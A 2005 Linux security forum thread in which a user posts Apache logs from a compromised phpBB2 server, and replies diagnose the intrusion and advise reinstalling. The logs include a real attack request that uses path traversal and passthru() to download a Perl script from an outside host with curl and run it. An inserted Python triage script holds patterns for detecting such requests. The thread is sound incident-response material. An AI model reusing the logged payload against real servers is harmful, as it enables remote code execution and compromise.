LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Old 07-18-2005, 07:27 AM   #1
chris_yumm
LQ Newbie
 
Registered: Jul 2005
Posts: 2

Rep: Reputation: 0
Does this mean that I have been had by this worm?


phpBB2-2.0.8a-1mdk
apache2-2.0.48-6.8.100mdk
libphp_common432-4.3.4-4.5.100mdk

I woke up this morning and I noticed that my outgoing bandwidth was being used to the maximum. I did a "top" and 2 "perl" processes were running. I killed them and the "upload" stopped. I tried to see who was logged in to the system by doing a "ps aux" and other than me and the normal root and system accounts there was nobody else. I also stopped the httpd service and had a look at access_log and these seemed like interesting lines:


72.20.3.126 - - [18/Jul/2005:01:11:31 +0100] "GET /phpBB2/ HTTP/1.1" 200 13695 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:32 +0100] "GET /phpBB2/ HTTP/1.1" 200 13539 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:33 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 13799 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:34 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 11267 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:35 +0100] "GrqA1g--" 200 17732 "-" "-"
72.20.3.126 - - [18/Jul/2005:01:11:36 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=46c0db294946ee2e9ab089aa91cd34c2 HTTP/1.1" 200 9396 "http://my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:41 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:46 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:51 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 13800 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:55 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 9101 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:32:55 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:33:01 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=189b991fba1c2b8730fa0afa0dc7f97c HTTP/1.1" 200 9396 "http://my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:17 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:21 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:22 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 13800 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:23 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 9101 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:36:23 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:36:24 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=c88b1b172db1fdbc20bd7d8529b057e2 HTTP/1.1" 200 9396 "http://www.my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:08 +0100] "GET /phpBB2/ HTTP/1.1" 200 14179 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:09 +0100] "GET /phpBB2/ HTTP/1.1" 200 14015 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:09 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=1&backupstart=1& gzipcompress=0&startdownload=1&sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 13800 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:10 +0100] "POST /phpBB2/admin/admin_db_utilities.php?sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 9101 "http://www.my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
69.93.68.34 - - [18/Jul/2005:01:37:10 +0100] "GrqA1g--" 200 17732 "-" "-"
69.93.68.34 - - [18/Jul/2005:01:37:11 +0100] "POST /phpBB2/admin/admin_styles.php?mode=export&sid=d80dd8c38162b8aeed90579c5b2f33af HTTP/1.1" 200 9396 "http://www.my-website.com/phpBB2/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
72.20.3.126 - - [18/Jul/2005:01:11:51 +0100] "GET /phpBB2/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=46c0db294946ee2e9ab089aa91cd34c2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://pandor4.gratishost.com/lollol.txt%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7938 "http://my-website.com/phpBB2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"



Am I just looking at attempts or have I been had? The style of my phpBB2 board has been changed to the default one also. What can I do to see what damage has been done? I changed most of the linux passwords this morning and left httpd off for now.
 
Old 07-18-2005, 02:54 PM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
That doesn't look like it exploits this vulnerability. In fact it's likely the older "admin_styles" vuln. It is interesting that you see 4 identical sets of attacks from 2 separate IPs in close proximity, but that may not mean anything and the code itself doesn't look like it's a self-propagating worm. It just looks like the same script run several times.

As far as what happened, you can see the SQL injection attack that uses "admin_db_utilities" to drop the table holding your site data and the final URL that uses the "admin_styles.php?" vuln to upload and execute a perl script. Check the upload directory (/tmp) for a file named a.pl.

You've been running a seriously outdated version of phpBB that has several significant vulnerabilities in it and have been compromised at least once. Simply upgrading phpBB to a current version and removing any files related to the compromise may not be enough. You should really format the system and re-install from trusted media. In the future, make sure to keep up with security updates and patches, as it will save you a lot of headaches.
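A defender-side log triage script, added here as an example; it is not code from the thread, from phpBB or from Mandrake. It parses Apache combined-format access log lines of the shape shown above, decodes the query string, and flags the things Capt_Caveman points at: hits on /admin/ scripts, directory traversal in a parameter such as install_to, and PHP execution functions such as passthru( appearing in a parameter value. It also flags request lines that do not parse as METHOD TARGET HTTP/x, which is what the "GrqA1g--" entries look like. The sample log lines, the RFC 5737 addresses, the sid values and the parameter name x are all constructed for the example, not copied from the post.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format:
#   ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A well-formed request line is METHOD TARGET HTTP/x.y; anything else is suspicious.
REQUEST_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>.+?) HTTP/\d\.\d$')

# Indicators a defender would want surfaced (patterns, not a signature database).
TRAVERSAL_RE = re.compile(r'(\.\./){2,}')                      # ../../ in a parameter value
PHP_EXEC_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen)\s*\(', re.I)
ADMIN_PATH_RE = re.compile(r'/admin/[^/]+\.php$')              # phpBB2 admin scripts

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it is not one."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rm = REQUEST_RE.match(rec['request'])
    if rm:
        parts = urlsplit(rm.group('target'))
        rec['method'] = rm.group('method')
        rec['path'] = parts.path
        # parse_qsl percent-decodes values, so %22 and %20 become " and space.
        rec['params'] = parse_qsl(parts.query, keep_blank_values=True)
        rec['malformed'] = False
    else:
        rec['method'], rec['path'], rec['params'] = None, None, []
        rec['malformed'] = True
    return rec

def findings(rec):
    """Return the list of reasons a parsed record is suspicious (empty if clean)."""
    reasons = []
    if rec['malformed']:
        return ['malformed request line']
    if ADMIN_PATH_RE.search(rec['path']):
        reasons.append('admin script hit')
    for name, value in rec['params']:
        if TRAVERSAL_RE.search(value):
            reasons.append(f'path traversal in {name}')
        if PHP_EXEC_RE.search(value):
            reasons.append(f'php exec function in {name}')
    return reasons

def triage(lines):
    """Group suspicious records by source IP: {ip: [(time, path_or_request, reasons), ...]}."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = findings(rec)
        if reasons:
            by_ip[rec['ip']].append((rec['time'], rec['path'] or rec['request'], reasons))
    return dict(by_ip)

# Constructed sample lines modelled on the shape of the thread's log (not copied from it).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jul/2005:01:11:31 +0100] "GET /phpBB2/ HTTP/1.1" 200 13695 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [18/Jul/2005:01:11:33 +0100] "GET /phpBB2/admin/admin_db_utilities.php?perform=backup&drop=1&sid=deadbeef HTTP/1.1" 200 13799 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [18/Jul/2005:01:11:35 +0100] "GrqA1g--" 200 17732 "-" "-"',
    '203.0.113.5 - - [18/Jul/2005:01:11:51 +0100] "GET /phpBB2/admin/admin_styles.php?mode=addnew&install_to=../../../../tmp&sid=deadbeef&x=passthru(%22id%22) HTTP/1.1" 200 7938 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [18/Jul/2005:02:00:00 +0100] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, hits in triage(SAMPLE_LOG).items():
        print(ip)
        for when, where, why in hits:
            print(f'  {when}  {where}  <- {", ".join(why)}')
```

Run it against a real access_log with `triage(open('access_log'))`; the grouping by IP is what makes the repeated sequence from the same two addresses stand out, and the "malformed request line" entries mark where the attack script stopped speaking HTTP.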
 
Old 07-18-2005, 02:57 PM   #3
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
//Moderator note: I'm moving this to its own thread as it isn't directly related to the original vulnerability discussion.
 
Old 07-19-2005, 02:39 AM   #4
chris_yumm
LQ Newbie
 
Registered: Jul 2005
Posts: 2

Original Poster
Rep: Reputation: 0
Darn, I had relied on the automatic vendor updates but I will not be doing that from now on. I had a look at the /tmp folder last night before formatting and reinstalling and there was no .pl file. It must have been removed. Anyway, it was a learning experience. Thank you!
 
Old 07-19-2005, 11:51 AM   #5
Brian Knoblauch
Member
 
Registered: Jan 2005
Distribution: SuSE (x86), NetBSD (Sparc), Solaris (Sparc & 32-bit x86)
Posts: 278

Rep: Reputation: 30
Any decent options to replace phpbb? I'm interested in using it, but the security issues with phpbb have made me NOT do it so far. Wondering if there's something better out there?
 
Old 07-19-2005, 12:34 PM   #6
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
Quote:
Originally posted by chris_yumm
Darn, I had relied on the automatic vendor updates but I will not be doing that from now on.
What version of Mandrake were you running?

Quote:
Originally posted by chris_yumm
I had a look at the /tmp folder last night before formatting and reinstalling and there was no .pl file. It must have been removed.
That's definitely troublesome as it suggests there was more activity that did not appear in the logs. Reinstalling is definitely the right move.

Quote:
Originally posted by chris_yumm
Anyway, it was a learning experience. Thank you!
No problem. Btw, welcome to linuxquestions.
 
Old 07-22-2005, 01:54 AM   #7
tkedwards
Senior Member
 
Registered: Aug 2004
Location: Munich, Germany
Distribution: Opensuse 11.2
Posts: 1,549

Rep: Reputation: 51
Quote:
Darn, I had relied on the automatic vendor updates but I will not be doing that from now on
phpBB is a contrib package, i.e. it was packaged by somebody outside of Mandrake. Mandrake doesn't provide updates for contrib packages between distro releases and never has.

However, there are about 3500 packages in main in the latest Mandrake distro, all of which they provide updates for. Your Mandrake installation will still mostly consist of those, so you should keep up with automatic updates; otherwise you'll probably get into even more trouble.
 
All times are GMT -5. The time now is 02:38 AM.